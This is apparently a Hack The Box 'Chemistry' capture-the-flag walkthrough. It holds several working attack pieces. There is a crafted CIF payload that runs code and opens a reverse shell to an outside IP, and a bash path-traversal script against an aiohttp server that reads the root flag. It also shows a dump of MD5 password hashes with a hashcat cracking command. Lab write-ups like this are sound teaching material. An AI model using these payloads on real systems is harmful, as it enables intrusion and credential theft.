HTB: Chemistry Walkthru

Enumeration

NMAP

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Thu, 21 Nov 2024 14:37:39 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
8081/tcp open  http    SimpleHTTPServer 0.6 (Python 3.8.10)
|_http-server-header: SimpleHTTP/0.6 Python/3.8.10
|_http-title: Directory listing for /

Directory Listing

I think that was a bug, because when I started the mashine again the next day, this directory was gone.

CIF Analyzer

Checking whether simple credentials like admin or admin:password work, but that is not the case.

So, a separate user must be created to access the page.

I tested uploading several files, but only **.CIF files** are allowed.

Exploit

The payload can therefore only be delivered through a **.CIF file**. It took some time and research with Google to find an appropriate method. The correct hint was provided by the following GitHub post:

Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation…

GitHub is where people build software. More than 100 million people use GitHub to discover, fork, and contribute to…

The security vulnerability can be exploited as follows, using the example provided on the GitHub page as a reference.

A system command can be executed using the following line:

_space_group_magn.transform_BNS_Pp_abc

Example on Github

'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'

Using the BuiltinImporter, the built-in module ”os” can be loaded, which is then used to execute commands on the system. In the example, it is utilized to create a file. This approach can be modified to establish a reverse connection.

_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.16/4444 0>&1'");0,0,0'

At the end of the file, the following block must be added:

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Foothold

And here is the reverse-shell

Unfortunately, the shell does not have the necessary permissions to read the user flag. Therefore, the privileges must be escalated.

Priv-Escalation

Continue on the CLI. First, perform an upgrade to a TTY shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

In the instance folder, located in the home directory of the user app, there is a file called database.db.

Check which DBMS is installed on the box.

apt list --installed |grep sql

The file can be opend with sqlite — perfect!

Show all tables in the database

sqlite3 database.db

.tables

Next, I query the data and output it using standard SQL syntax.

select * from user;

1|admin|2861debaf8d99436a10ed6f75a252abf
2|app|197865e46b878d9e74a0346b6d59886a
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5
4|robert|02fcf7cfc10adc37959fb21f06c6b467
5|jobert|3dec299e06f7ed187bac06bd3b670ab2
6|carlos|9ad48828b0955513f7cf0f7f6510c8f8
7|peter|6845c17d298d95aa942127bdad2ceb9b
8|victoria|c3601ad2286a4293868ec2a4bc606ba3
9|tania|a4aa55e816205dc0389591c9f82f43bb
10|eusebio|6cad48078d0241cca9a7b322ecd073b3
11|gelacia|4af70c80b68267012ecdac9a7e916d18
12|fabian|4e5d71f53fdd2eabdbabb233113b5dc0
13|axel|9347f9724ca083b17e39555c36fd9007
14|kristel|6896ba7b11a62cacffbdaded457c6d92
15|username|cc03e747a6afbbcbf8be7668acfebee5

Here, I found users along with their hashes. These are MD5 hashes which can easily be cracked using Hashcat.

hashcat -m 0 hashes /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

One of the passwords is for the user rosa. Accordingly, you can now log in with this user and capture the user flag.

Root-Flag

For a quick overview, Linpeas can be used.

Releases · peass-ng/PEASS-ng

PEASS – Privilege Escalation Awesome Scripts SUITE (with colors) – Releases · peass-ng/PEASS-ng

Simply copy it to the box using python -m http.server.

It looks like there is a vulnerability related to CVE-2021–3560.

GitHub – 0xdevil/CVE-2021-3156: CVE-2021-3156: Sudo heap overflow exploit for Debian 10

CVE-2021-3156: Sudo heap overflow exploit for Debian 10 – 0xdevil/CVE-2021-3156

Unfortunately, this was not confirmed, as the system is not vulnerable to the CVE-2021–3560 vulnerability. No vectors for potential privilege escalation via SUID could be identified either. Therefore, I checked which services are open on the system.

It seems that an application is running on TCP port 8080.

It appears to be some kind of monitoring application running on port 8080.

There seems to be a CVE related to the Python server that can be exploited quite easily.

GitHub – z3rObyte/CVE-2024-23334-PoC: A proof of concept of the path traversal vulnerability in the…

A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1 …

LFI-aiohttp-CVE-2024-23334-PoC/lfi_aiohttp.sh at main ·…

Bash script to automate Local File Inclusion (LFI) attacks on aiohttp server version 3.9.1. …

Accordingly, the script from the first GitHub repository can be easily modified, allowing direct access to the root flag.

#!/bin/bash

url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt" # without the first /

for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"

    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done